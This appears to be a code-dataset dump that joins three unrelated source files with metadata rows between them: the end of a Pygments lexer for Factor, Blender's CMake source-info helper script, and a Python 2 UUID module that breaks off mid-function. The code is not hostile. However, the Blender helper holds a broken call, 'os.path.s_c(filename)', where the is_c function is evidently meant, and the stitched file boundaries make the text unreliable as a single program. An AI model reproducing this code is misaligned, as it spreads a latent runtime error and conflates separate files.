'push-all', 'push-either', 'push-if', 'reduce', 'reduce-index', 'remove',
'remove!', 'remove-eq', 'remove-eq!', 'remove-nth', 'remove-nth!', 'repetition',
'repetition?', 'replace-slice', 'replicate', 'replicate-as', 'rest',
'rest-slice', 'reverse', 'reverse!', 'reversed', 'reversed?', 'second',
'selector', 'selector-for', 'sequence', 'sequence-hashcode', 'sequence=',
'sequence?', 'set-first', 'set-fourth', 'set-last', 'set-length', 'set-nth',
'set-second', 'set-third', 'short', 'shorten', 'shorter', 'shorter?',
'shortest', 'sift', 'slice', 'slice-error', 'slice-error?', 'slice?',
'snip', 'snip-slice', 'start', 'start*', 'subseq', 'subseq?', 'suffix',
'suffix!', 'sum', 'sum-lengths', 'supremum', 'supremum-by', 'surround', 'tail',
'tail-slice', 'tail-slice*', 'tail*', 'tail?', 'third', 'trim',
'trim-head', 'trim-head-slice', 'trim-slice', 'trim-tail', 'trim-tail-slice',
'unclip', 'unclip-last', 'unclip-last-slice', 'unclip-slice', 'unless-empty',
'virtual-exemplar', 'virtual-sequence', 'virtual-sequence?', 'virtual@',
'when-empty'), suffix=r'\s')
builtin_namespaces = words((
'+@', 'change', 'change-global', 'counter', 'dec', 'get', 'get-global',
'global', 'inc', 'init-namespaces', 'initialize', 'is-global', 'make-assoc',
'namespace', 'namestack', 'off', 'on', 'set', 'set-global', 'set-namestack',
'toggle', 'with-global', 'with-scope', 'with-variable', 'with-variables'),
suffix=r'\s')
builtin_arrays = words((
'1array', '2array', '3array', '4array', '<array>', '>array', 'array',
'array?', 'pair', 'pair?', 'resize-array'), suffix=r'\s')
builtin_io = words((
'(each-stream-block-slice)', '(each-stream-block)',
'(stream-contents-by-block)', '(stream-contents-by-element)',
'(stream-contents-by-length-or-block)',
'(stream-contents-by-length)', '+byte+', '+character+',
'bad-seek-type', 'bad-seek-type?', 'bl', 'contents', 'each-block',
'each-block-size', 'each-block-slice', 'each-line', 'each-morsel',
'each-stream-block', 'each-stream-block-slice', 'each-stream-line',
'error-stream', 'flush', 'input-stream', 'input-stream?',
'invalid-read-buffer', 'invalid-read-buffer?', 'lines', 'nl',
'output-stream', 'output-stream?', 'print', 'read', 'read-into',
'read-partial', 'read-partial-into', 'read-until', 'read1', 'readln',
'seek-absolute', 'seek-absolute?', 'seek-end', 'seek-end?',
'seek-input', 'seek-output', 'seek-relative', 'seek-relative?',
'stream-bl', 'stream-contents', 'stream-contents*', 'stream-copy',
'stream-copy*', 'stream-element-type', 'stream-flush',
'stream-length', 'stream-lines', 'stream-nl', 'stream-print',
'stream-read', 'stream-read-into', 'stream-read-partial',
'stream-read-partial-into', 'stream-read-partial-unsafe',
'stream-read-unsafe', 'stream-read-until', 'stream-read1',
'stream-readln', 'stream-seek', 'stream-seekable?', 'stream-tell',
'stream-write', 'stream-write1', 'tell-input', 'tell-output',
'with-error-stream', 'with-error-stream*', 'with-error>output',
'with-input-output+error-streams',
'with-input-output+error-streams*', 'with-input-stream',
'with-input-stream*', 'with-output-stream', 'with-output-stream*',
'with-output>error', 'with-output+error-stream',
'with-output+error-stream*', 'with-streams', 'with-streams*',
'write', 'write1'), suffix=r'\s')
builtin_strings = words((
'1string', '<string>', '>string', 'resize-string', 'string',
'string?'), suffix=r'\s')
builtin_vectors = words((
'1vector', '<vector>', '>vector', '?push', 'vector', 'vector?'),
suffix=r'\s')
builtin_continuations = words((
'<condition>', '<continuation>', '<restart>', 'attempt-all',
'attempt-all-error', 'attempt-all-error?', 'callback-error-hook',
'callcc0', 'callcc1', 'cleanup', 'compute-restarts', 'condition',
'condition?', 'continuation', 'continuation?', 'continue',
'continue-restart', 'continue-with', 'current-continuation',
'error', 'error-continuation', 'error-in-thread', 'error-thread',
'ifcc', 'ignore-errors', 'in-callback?', 'original-error', 'recover',
'restart', 'restart?', 'restarts', 'rethrow', 'rethrow-restarts',
'return', 'return-continuation', 'thread-error-hook', 'throw-continue',
'throw-restarts', 'with-datastack', 'with-return'), suffix=r'\s')
tokens = {
'root': [
# factor allows a file to start with a shebang
(r'#!.*$', Comment.Preproc),
default('base'),
],
'base': [
(r'\s+', Text),
# defining words
(r'((?:MACRO|MEMO|TYPED)?:[:]?)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(M:[:]?)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Function)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(GENERIC:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'(HOOK:|GENERIC#)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Function)),
(r'\(\s', Name.Function, 'stackeffect'),
(r';\s', Keyword),
# imports and namespaces
(r'(USING:)(\s+)',
bygroups(Keyword.Namespace, Text), 'vocabs'),
(r'(USE:|UNUSE:|IN:|QUALIFIED:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace)),
(r'(QUALIFIED-WITH:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text, Name.Namespace)),
(r'(FROM:|EXCLUDE:)(\s+)(\S+)(\s+=>\s)',
bygroups(Keyword.Namespace, Text, Name.Namespace, Text), 'words'),
(r'(RENAME:)(\s+)(\S+)(\s+)(\S+)(\s+=>\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Namespace, Text, Name.Function)),
(r'(ALIAS:|TYPEDEF:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function)),
(r'(DEFER:|FORGET:|POSTPONE:)(\s+)(\S+)',
bygroups(Keyword.Namespace, Text, Name.Function)),
# tuples and classes
(r'(TUPLE:|ERROR:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class), 'slots'),
(r'(TUPLE:|ERROR:|BUILTIN:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class), 'slots'),
(r'(MIXIN:|UNION:|INTERSECTION:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class)),
(r'(PREDICATE:)(\s+)(\S+)(\s+<\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(C:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function, Text, Name.Class)),
(r'(INSTANCE:)(\s+)(\S+)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Class, Text, Name.Class)),
(r'(SLOT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Function)),
(r'(SINGLETON:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'SINGLETONS:', Keyword, 'classes'),
# other syntax
(r'(CONSTANT:|SYMBOL:|MAIN:|HELP:)(\s+)(\S+)',
bygroups(Keyword, Text, Name.Function)),
(r'SYMBOLS:\s', Keyword, 'words'),
(r'SYNTAX:\s', Keyword),
(r'ALIEN:\s', Keyword),
(r'(STRUCT:)(\s+)(\S+)', bygroups(Keyword, Text, Name.Class)),
(r'(FUNCTION:)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text)),
(r'(FUNCTION-ALIAS:)(\s+)(\S+)(\s+\S+\s+)(\S+)(\s+\(\s+[^)]+\)\s)',
bygroups(Keyword.Namespace, Text, Name.Function, Text, Name.Function, Text)),
# vocab.private
(r'(?:<PRIVATE|PRIVATE>)\s', Keyword.Namespace),
# strings
(r'"""\s+(?:.|\n)*?\s+"""', String),
(r'"(?:\\\\|\\"|[^"])*"', String),
(r'\S+"\s+(?:\\\\|\\"|[^"])*"', String),
(r'CHAR:\s+(?:\\[\\abfnrstv]|[^\\]\S*)\s', String.Char),
# comments
(r'!\s+.*$', Comment),
(r'#!\s+.*$', Comment),
(r'/\*\s+(?:.|\n)*?\s\*/\s', Comment),
# boolean constants
(r'[tf]\s', Name.Constant),
# symbols and literals
(r'[\\$]\s+\S+', Name.Constant),
(r'M\\\s+\S+\s+\S+', Name.Constant),
# numbers
(r'[+-]?(?:[\d,]*\d)?\.(?:\d([\d,]*\d)?)?(?:[eE][+-]?\d+)?\s', Number),
(r'[+-]?\d(?:[\d,]*\d)?(?:[eE][+-]?\d+)?\s', Number),
(r'0x[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'NAN:\s+[a-fA-F\d](?:[a-fA-F\d,]*[a-fA-F\d])?(?:p\d([\d,]*\d)?)?\s', Number),
(r'0b[01]+\s', Number.Bin),
(r'0o[0-7]+\s', Number.Oct),
(r'(?:\d([\d,]*\d)?)?\+\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
(r'(?:\-\d([\d,]*\d)?)?\-\d(?:[\d,]*\d)?/\d(?:[\d,]*\d)?\s', Number),
# keywords
(r'(?:deprecated|final|foldable|flushable|inline|recursive)\s',
Keyword),
# builtins
(builtin_kernel, Name.Builtin),
(builtin_assocs, Name.Builtin),
(builtin_combinators, Name.Builtin),
(builtin_math, Name.Builtin),
(builtin_sequences, Name.Builtin),
(builtin_namespaces, Name.Builtin),
(builtin_arrays, Name.Builtin),
(builtin_io, Name.Builtin),
(builtin_strings, Name.Builtin),
(builtin_vectors, Name.Builtin),
(builtin_continuations, Name.Builtin),
# everything else is text
(r'\S+', Text),
],
'stackeffect': [
(r'\s+', Text),
(r'\(\s+', Name.Function, 'stackeffect'),
(r'\)\s', Name.Function, '#pop'),
(r'--\s', Name.Function),
(r'\S+', Name.Variable),
],
'slots': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'(\{\s+)(\S+)(\s+[^}]+\s+\}\s)',
bygroups(Text, Name.Variable, Text)),
(r'\S+', Name.Variable),
],
'vocabs': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Namespace),
],
'classes': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Class),
],
'words': [
(r'\s+', Text),
(r';\s', Keyword, '#pop'),
(r'\S+', Name.Function),
],
}
| apache-2.0 | 2,164,327,082,958,854,700 | 50.930233 | 106 | 0.508453 | false |
pawkoz/dyplom | blender/build_files/cmake/project_source_info.py | 2 | 7070 | # ***** BEGIN GPL LICENSE BLOCK *****
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# Contributor(s): Campbell Barton
#
# ***** END GPL LICENSE BLOCK *****
# <pep8 compliant>
__all__ = (
"build_info",
"SOURCE_DIR",
)
import sys
if not sys.version.startswith("3"):
print("\nPython3.x needed, found %s.\nAborting!\n" %
sys.version.partition(" ")[0])
sys.exit(1)
import os
from os.path import join, dirname, normpath, abspath
SOURCE_DIR = join(dirname(__file__), "..", "..")
SOURCE_DIR = normpath(SOURCE_DIR)
SOURCE_DIR = abspath(SOURCE_DIR)
def is_c_header(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".h", ".hpp", ".hxx", ".hh"})
def is_c(filename):
ext = os.path.splitext(filename)[1]
return (ext in {".c", ".cpp", ".cxx", ".m", ".mm", ".rc", ".cc", ".inl", ".osl"})
def is_c_any(filename):
return os.path.s_c(filename) or is_c_header(filename)
# copied from project_info.py
CMAKE_DIR = "."
def cmake_cache_var_iter():
import re
re_cache = re.compile(r'([A-Za-z0-9_\-]+)?:?([A-Za-z0-9_\-]+)?=(.*)$')
with open(join(CMAKE_DIR, "CMakeCache.txt"), 'r', encoding='utf-8') as cache_file:
for l in cache_file:
match = re_cache.match(l.strip())
if match is not None:
var, type_, val = match.groups()
yield (var, type_ or "", val)
def cmake_cache_var(var):
for var_iter, type_iter, value_iter in cmake_cache_var_iter():
if var == var_iter:
return value_iter
return None
def do_ignore(filepath, ignore_prefix_list):
if ignore_prefix_list is None:
return False
relpath = os.path.relpath(filepath, SOURCE_DIR)
return any([relpath.startswith(prefix) for prefix in ignore_prefix_list])
def makefile_log():
import subprocess
import time
# support both make and ninja
make_exe = cmake_cache_var("CMAKE_MAKE_PROGRAM")
make_exe_basename = os.path.basename(make_exe)
if make_exe_basename.startswith(("make", "gmake")):
print("running 'make' with --dry-run ...")
process = subprocess.Popen([make_exe, "--always-make", "--dry-run", "--keep-going", "VERBOSE=1"],
stdout=subprocess.PIPE,
)
elif make_exe_basename.startswith("ninja"):
print("running 'ninja' with -t commands ...")
process = subprocess.Popen([make_exe, "-t", "commands"],
stdout=subprocess.PIPE,
)
while process.poll():
time.sleep(1)
out = process.stdout.read()
process.stdout.close()
print("done!", len(out), "bytes")
return out.decode("utf-8", errors="ignore").split("\n")
def build_info(use_c=True, use_cxx=True, ignore_prefix_list=None):
makelog = makefile_log()
source = []
compilers = []
if use_c:
compilers.append(cmake_cache_var("CMAKE_C_COMPILER"))
if use_cxx:
compilers.append(cmake_cache_var("CMAKE_CXX_COMPILER"))
print("compilers:", " ".join(compilers))
fake_compiler = "%COMPILER%"
print("parsing make log ...")
for line in makelog:
args = line.split()
if not any([(c in args) for c in compilers]):
continue
# join args incase they are not.
args = ' '.join(args)
args = args.replace(" -isystem", " -I")
args = args.replace(" -D ", " -D")
args = args.replace(" -I ", " -I")
for c in compilers:
args = args.replace(c, fake_compiler)
args = args.split()
# end
# remove compiler
args[:args.index(fake_compiler) + 1] = []
c_files = [f for f in args if is_c(f)]
inc_dirs = [f[2:].strip() for f in args if f.startswith('-I')]
defs = [f[2:].strip() for f in args if f.startswith('-D')]
for c in sorted(c_files):
if do_ignore(c, ignore_prefix_list):
continue
source.append((c, inc_dirs, defs))
# make relative includes absolute
# not totally essential but useful
for i, f in enumerate(inc_dirs):
if not os.path.isabs(f):
inc_dirs[i] = os.path.abspath(os.path.join(CMAKE_DIR, f))
# safety check that our includes are ok
for f in inc_dirs:
if not os.path.exists(f):
raise Exception("%s missing" % f)
print("done!")
return source
def build_defines_as_source():
"""
Returns a string formatted as an include:
'#defines A=B\n#define....'
"""
import subprocess
# works for both gcc and clang
cmd = (cmake_cache_var("CMAKE_C_COMPILER"), "-dM", "-E", "-")
return subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.DEVNULL,
).stdout.read().strip().decode('ascii')
def build_defines_as_args():
return [("-D" + "=".join(l.split(maxsplit=2)[1:]))
for l in build_defines_as_source().split("\n")
if l.startswith('#define')]
# could be moved elsewhere!, this just happens to be used by scripts that also
# use this module.
def queue_processes(process_funcs, job_total=-1):
""" Takes a list of function arg pairs, each function must return a process
"""
if job_total == -1:
import multiprocessing
job_total = multiprocessing.cpu_count()
del multiprocessing
if job_total == 1:
for func, args in process_funcs:
sys.stdout.flush()
sys.stderr.flush()
process = func(*args)
process.wait()
else:
import time
processes = []
for func, args in process_funcs:
# wait until a thread is free
while 1:
processes[:] = [p for p in processes if p.poll() is None]
if len(processes) <= job_total:
break
else:
time.sleep(0.1)
sys.stdout.flush()
sys.stderr.flush()
processes.append(func(*args))
def main():
if not os.path.exists(join(CMAKE_DIR, "CMakeCache.txt")):
print("This script must run from the cmake build dir")
return
for s in build_info():
print(s)
if __name__ == "__main__":
main()
| gpl-2.0 | -4,033,341,245,711,790,000 | 27.508065 | 105 | 0.569448 | false |
openhatch/oh-mainline | vendor/packages/django-extensions/django_extensions/utils/uuid.py | 44 | 20400 | r"""UUID objects (universally unique identifiers) according to RFC 4122.
This module provides immutable UUID objects (class UUID) and the functions
uuid1(), uuid3(), uuid4(), uuid5() for generating version 1, 3, 4, and 5
UUIDs as specified in RFC 4122.
If all you want is a unique ID, you should probably call uuid1() or uuid4().
Note that uuid1() may compromise privacy since it creates a UUID containing
the computer's network address. uuid4() creates a random UUID.
Typical usage:
>>> import uuid
# make a UUID based on the host ID and current time
>>> uuid.uuid1()
UUID('a8098c1a-f86e-11da-bd1a-00112444be1e')
# make a UUID using an MD5 hash of a namespace UUID and a name
>>> uuid.uuid3(uuid.NAMESPACE_DNS, 'python.org')
UUID('6fa459ea-ee8a-3ca4-894e-db77e160355e')
# make a random UUID
>>> uuid.uuid4()
UUID('16fd2706-8baf-433b-82eb-8c7fada847da')
# make a UUID using a SHA-1 hash of a namespace UUID and a name
>>> uuid.uuid5(uuid.NAMESPACE_DNS, 'python.org')
UUID('886313e1-3b8a-5372-9b90-0c9aee199e5d')
# make a UUID from a string of hex digits (braces and hyphens ignored)
>>> x = uuid.UUID('{00010203-0405-0607-0809-0a0b0c0d0e0f}')
# convert a UUID to a string of hex digits in standard form
>>> str(x)
'00010203-0405-0607-0809-0a0b0c0d0e0f'
# get the raw 16 bytes of the UUID
>>> x.bytes
'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f'
# make a UUID from a 16-byte string
>>> uuid.UUID(bytes=x.bytes)
UUID('00010203-0405-0607-0809-0a0b0c0d0e0f')
"""
__author__ = 'Ka-Ping Yee <[email protected]>'
RESERVED_NCS, RFC_4122, RESERVED_MICROSOFT, RESERVED_FUTURE = [
'reserved for NCS compatibility', 'specified in RFC 4122',
'reserved for Microsoft compatibility', 'reserved for future definition'
]
class UUID(object):
"""Instances of the UUID class represent UUIDs as specified in RFC 4122.
UUID objects are immutable, hashable, and usable as dictionary keys.
Converting a UUID to a string with str() yields something in the form
'12345678-1234-1234-1234-123456789abc'. The UUID constructor accepts
five possible forms: a similar string of hexadecimal digits, or a tuple
of six integer fields (with 32-bit, 16-bit, 16-bit, 8-bit, 8-bit, and
48-bit values respectively) as an argument named 'fields', or a string
of 16 bytes (with all the integer fields in big-endian order) as an
argument named 'bytes', or a string of 16 bytes (with the first three
fields in little-endian order) as an argument named 'bytes_le', or a
single 128-bit integer as an argument named 'int'.
UUIDs have these read-only attributes:
bytes the UUID as a 16-byte string (containing the six
integer fields in big-endian byte order)
bytes_le the UUID as a 16-byte string (with time_low, time_mid,
and time_hi_version in little-endian byte order)
fields a tuple of the six integer fields of the UUID,
which are also available as six individual attributes
and two derived attributes:
time_low the first 32 bits of the UUID
time_mid the next 16 bits of the UUID
time_hi_version the next 16 bits of the UUID
clock_seq_hi_variant the next 8 bits of the UUID
clock_seq_low the next 8 bits of the UUID
node the last 48 bits of the UUID
time the 60-bit timestamp
clock_seq the 14-bit sequence number
hex the UUID as a 32-character hexadecimal string
int the UUID as a 128-bit integer
urn the UUID as a URN as specified in RFC 4122
variant the UUID variant (one of the constants RESERVED_NCS,
RFC_4122, RESERVED_MICROSOFT, or RESERVED_FUTURE)
version the UUID version number (1 through 5, meaningful only
when the variant is RFC_4122)
"""
def __init__(self, hex=None, bytes=None, bytes_le=None, fields=None,
int=None, version=None):
r"""Create a UUID from either a string of 32 hexadecimal digits,
a string of 16 bytes as the 'bytes' argument, a string of 16 bytes
in little-endian order as the 'bytes_le' argument, a tuple of six
integers (32-bit time_low, 16-bit time_mid, 16-bit time_hi_version,
8-bit clock_seq_hi_variant, 8-bit clock_seq_low, 48-bit node) as
the 'fields' argument, or a single 128-bit integer as the 'int'
argument. When a string of hex digits is given, curly braces,
hyphens, and a URN prefix are all optional. For example, these
expressions all yield the same UUID:
UUID('{12345678-1234-5678-1234-567812345678}')
UUID('12345678123456781234567812345678')
UUID('urn:uuid:12345678-1234-5678-1234-567812345678')
UUID(bytes='\x12\x34\x56\x78'*4)
UUID(bytes_le='\x78\x56\x34\x12\x34\x12\x78\x56' +
'\x12\x34\x56\x78\x12\x34\x56\x78')
UUID(fields=(0x12345678, 0x1234, 0x5678, 0x12, 0x34, 0x567812345678))
UUID(int=0x12345678123456781234567812345678)
Exactly one of 'hex', 'bytes', 'bytes_le', 'fields', or 'int' must
be given. The 'version' argument is optional; if given, the resulting
UUID will have its variant and version set according to RFC 4122,
overriding the given 'hex', 'bytes', 'bytes_le', 'fields', or 'int'.
"""
if [hex, bytes, bytes_le, fields, int].count(None) != 4:
raise TypeError('need one of hex, bytes, bytes_le, fields, or int')
if hex is not None:
hex = hex.replace('urn:', '').replace('uuid:', '')
hex = hex.strip('{}').replace('-', '')
if len(hex) != 32:
raise ValueError('badly formed hexadecimal UUID string')
int = long(hex, 16)
if bytes_le is not None:
if len(bytes_le) != 16:
raise ValueError('bytes_le is not a 16-char string')
bytes = (bytes_le[3] + bytes_le[2] + bytes_le[1] + bytes_le[0] +
bytes_le[5] + bytes_le[4] + bytes_le[7] + bytes_le[6] +
bytes_le[8:])
if bytes is not None:
if len(bytes) != 16:
raise ValueError('bytes is not a 16-char string')
int = long(('%02x' * 16) % tuple(map(ord, bytes)), 16)
if fields is not None:
if len(fields) != 6:
raise ValueError('fields is not a 6-tuple')
(time_low, time_mid, time_hi_version,
clock_seq_hi_variant, clock_seq_low, node) = fields
if not 0 <= time_low < 1 << 32L:
raise ValueError('field 1 out of range (need a 32-bit value)')
if not 0 <= time_mid < 1 << 16L:
raise ValueError('field 2 out of range (need a 16-bit value)')
if not 0 <= time_hi_version < 1 << 16L:
raise ValueError('field 3 out of range (need a 16-bit value)')
if not 0 <= clock_seq_hi_variant < 1 << 8L:
raise ValueError('field 4 out of range (need an 8-bit value)')
if not 0 <= clock_seq_low < 1 << 8L:
raise ValueError('field 5 out of range (need an 8-bit value)')
if not 0 <= node < 1 << 48L:
raise ValueError('field 6 out of range (need a 48-bit value)')
clock_seq = (clock_seq_hi_variant << 8L) | clock_seq_low
int = ((time_low << 96L) | (time_mid << 80L) |
(time_hi_version << 64L) | (clock_seq << 48L) | node)
if int is not None:
if not 0 <= int < 1 << 128L:
raise ValueError('int is out of range (need a 128-bit value)')
if version is not None:
if not 1 <= version <= 5:
raise ValueError('illegal version number')
# Set the variant to RFC 4122.
int &= ~(0xc000 << 48L)
int |= 0x8000 << 48L
# Set the version number.
int &= ~(0xf000 << 64L)
int |= version << 76L
self.__dict__['int'] = int
def __cmp__(self, other):
if isinstance(other, UUID):
return cmp(self.int, other.int)
return NotImplemented
def __hash__(self):
return hash(self.int)
def __int__(self):
return self.int
def __repr__(self):
return 'UUID(%r)' % str(self)
def __setattr__(self, name, value):
raise TypeError('UUID objects are immutable')
def __str__(self):
hex = '%032x' % self.int
return '%s-%s-%s-%s-%s' % (
hex[:8], hex[8:12], hex[12:16], hex[16:20], hex[20:])
def get_bytes(self):
bytes = ''
for shift in range(0, 128, 8):
bytes = chr((self.int >> shift) & 0xff) + bytes
return bytes
bytes = property(get_bytes)
def get_bytes_le(self):
bytes = self.bytes
return (bytes[3] + bytes[2] + bytes[1] + bytes[0] +
bytes[5] + bytes[4] + bytes[7] + bytes[6] + bytes[8:])
bytes_le = property(get_bytes_le)
def get_fields(self):
return (self.time_low, self.time_mid, self.time_hi_version,
self.clock_seq_hi_variant, self.clock_seq_low, self.node)
fields = property(get_fields)
def get_time_low(self):
return self.int >> 96L
time_low = property(get_time_low)
def get_time_mid(self):
return (self.int >> 80L) & 0xffff
time_mid = property(get_time_mid)
def get_time_hi_version(self):
return (self.int >> 64L) & 0xffff
time_hi_version = property(get_time_hi_version)
def get_clock_seq_hi_variant(self):
return (self.int >> 56L) & 0xff
clock_seq_hi_variant = property(get_clock_seq_hi_variant)
def get_clock_seq_low(self):
return (self.int >> 48L) & 0xff
clock_seq_low = property(get_clock_seq_low)
def get_time(self):
return (((self.time_hi_version & 0x0fffL) << 48L) |
(self.time_mid << 32L) | self.time_low)
time = property(get_time)
def get_clock_seq(self):
return (((self.clock_seq_hi_variant & 0x3fL) << 8L) |
self.clock_seq_low)
clock_seq = property(get_clock_seq)
def get_node(self):
return self.int & 0xffffffffffff
node = property(get_node)
def get_hex(self):
return '%032x' % self.int
hex = property(get_hex)
def get_urn(self):
return 'urn:uuid:' + str(self)
urn = property(get_urn)
def get_variant(self):
if not self.int & (0x8000 << 48L):
return RESERVED_NCS
elif not self.int & (0x4000 << 48L):
return RFC_4122
elif not self.int & (0x2000 << 48L):
return RESERVED_MICROSOFT
else:
return RESERVED_FUTURE
variant = property(get_variant)
def get_version(self):
# The version bits are only meaningful for RFC 4122 UUIDs.
if self.variant == RFC_4122:
return int((self.int >> 76L) & 0xf)
version = property(get_version)
def _find_mac(command, args, hw_identifiers, get_index):
import os
for dir in ['', '/sbin/', '/usr/sbin']:
executable = os.path.join(dir, command)
if not os.path.exists(executable):
continue
try:
# LC_ALL to get English output, 2>/dev/null to
# prevent output on stderr
cmd = 'LC_ALL=C %s %s 2>/dev/null' % (executable, args)
pipe = os.popen(cmd)
except IOError:
continue
for line in pipe:
words = line.lower().split()
for i in range(len(words)):
if words[i] in hw_identifiers:
return int(words[get_index(i)].replace(':', ''), 16)
return None
def _ifconfig_getnode():
"""Get the hardware address on Unix by running ifconfig."""
# This works on Linux ('' or '-a'), Tru64 ('-av'), but not all Unixes.
for args in ('', '-a', '-av'):
mac = _find_mac('ifconfig', args, ['hwaddr', 'ether'], lambda i: i + 1)
if mac:
return mac
import socket
ip_addr = socket.gethostbyname(socket.gethostname())
# Try getting the MAC addr from arp based on our IP address (Solaris).
mac = _find_mac('arp', '-an', [ip_addr], lambda i: -1)
if mac:
return mac
# This might work on HP-UX.
mac = _find_mac('lanscan', '-ai', ['lan0'], lambda i: 0)
if mac:
return mac
return None
def _ipconfig_getnode():
"""Get the hardware address on Windows by running ipconfig.exe."""
import os
import re
dirs = ['', r'c:\windows\system32', r'c:\winnt\system32']
try:
import ctypes
buffer = ctypes.create_string_buffer(300)
ctypes.windll.kernel32.GetSystemDirectoryA(buffer, 300)
dirs.insert(0, buffer.value.decode('mbcs'))
except:
pass
for dir in dirs:
try:
pipe = os.popen(os.path.join(dir, 'ipconfig') + ' /all')
except IOError:
continue
for line in pipe:
value = line.split(':')[-1].strip().lower()
if re.match('([0-9a-f][0-9a-f]-){5}[0-9a-f][0-9a-f]', value):
return int(value.replace('-', ''), 16)
def _netbios_getnode():
"""Get the hardware address on Windows using NetBIOS calls.
See http://support.microsoft.com/kb/118623 for details."""
import win32wnet
import netbios
ncb = netbios.NCB()
ncb.Command = netbios.NCBENUM
ncb.Buffer = adapters = netbios.LANA_ENUM()
adapters._pack()
if win32wnet.Netbios(ncb) != 0:
return
adapters._unpack()
for i in range(adapters.length):
ncb.Reset()
ncb.Command = netbios.NCBRESET
ncb.Lana_num = ord(adapters.lana[i])
if win32wnet.Netbios(ncb) != 0:
continue
ncb.Reset()
ncb.Command = netbios.NCBASTAT
ncb.Lana_num = ord(adapters.lana[i])
ncb.Callname = '*'.ljust(16)
ncb.Buffer = status = netbios.ADAPTER_STATUS()
if win32wnet.Netbios(ncb) != 0:
continue
status._unpack()
bytes = map(ord, status.adapter_address)
return ((bytes[0] << 40L) + (bytes[1] << 32L) + (bytes[2] << 24L) +
(bytes[3] << 16L) + (bytes[4] << 8L) + bytes[5])
# Thanks to Thomas Heller for ctypes and for his help with its use here.
# If ctypes is available, use it to find system routines for UUID generation.
_uuid_generate_random = _uuid_generate_time = _UuidCreate = None
try:
import ctypes
import ctypes.util
_buffer = ctypes.create_string_buffer(16)
# The uuid_generate_* routines are provided by libuuid on at least
# Linux and FreeBSD, and provided by libc on Mac OS X.
for libname in ['uuid', 'c']:
try:
lib = ctypes.CDLL(ctypes.util.find_library(libname))
except:
continue
if hasattr(lib, 'uuid_generate_random'):
_uuid_generate_random = lib.uuid_generate_random
if hasattr(lib, 'uuid_generate_time'):
_uuid_generate_time = lib.uuid_generate_time
# On Windows prior to 2000, UuidCreate gives a UUID containing the
# hardware address. On Windows 2000 and later, UuidCreate makes a
# random UUID and UuidCreateSequential gives a UUID containing the
# hardware address. These routines are provided by the RPC runtime.
# NOTE: at least on Tim's WinXP Pro SP2 desktop box, while the last
# 6 bytes returned by UuidCreateSequential are fixed, they don't appear
# to bear any relationship to the MAC address of any network device
# on the box.
try:
lib = ctypes.windll.rpcrt4
except:
lib = None
_UuidCreate = getattr(lib, 'UuidCreateSequential',
getattr(lib, 'UuidCreate', None))
except:
pass
def _unixdll_getnode():
"""Get the hardware address on Unix using ctypes."""
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw).node
def _windll_getnode():
"""Get the hardware address on Windows using ctypes."""
if _UuidCreate(_buffer) == 0:
return UUID(bytes=_buffer.raw).node
def _random_getnode():
"""Get a random node ID, with eighth bit set as suggested by RFC 4122."""
import random
return random.randrange(0, 1 << 48L) | 0x010000000000L
_node = None
def getnode():
"""Get the hardware address as a 48-bit positive integer.
The first time this runs, it may launch a separate program, which could
be quite slow. If all attempts to obtain the hardware address fail, we
choose a random 48-bit number with its eighth bit set to 1 as recommended
in RFC 4122.
"""
global _node
if _node is not None:
return _node
import sys
if sys.platform == 'win32':
getters = [_windll_getnode, _netbios_getnode, _ipconfig_getnode]
else:
getters = [_unixdll_getnode, _ifconfig_getnode]
for getter in getters + [_random_getnode]:
try:
_node = getter()
except:
continue
if _node is not None:
return _node
_last_timestamp = None
def uuid1(node=None, clock_seq=None):
"""Generate a UUID from a host ID, sequence number, and the current time.
If 'node' is not given, getnode() is used to obtain the hardware
address. If 'clock_seq' is given, it is used as the sequence number;
otherwise a random 14-bit sequence number is chosen."""
# When the system provides a version-1 UUID generator, use it (but don't
# use UuidCreate here because its UUIDs don't conform to RFC 4122).
if _uuid_generate_time and node is clock_seq is None:
_uuid_generate_time(_buffer)
return UUID(bytes=_buffer.raw)
global _last_timestamp
import time
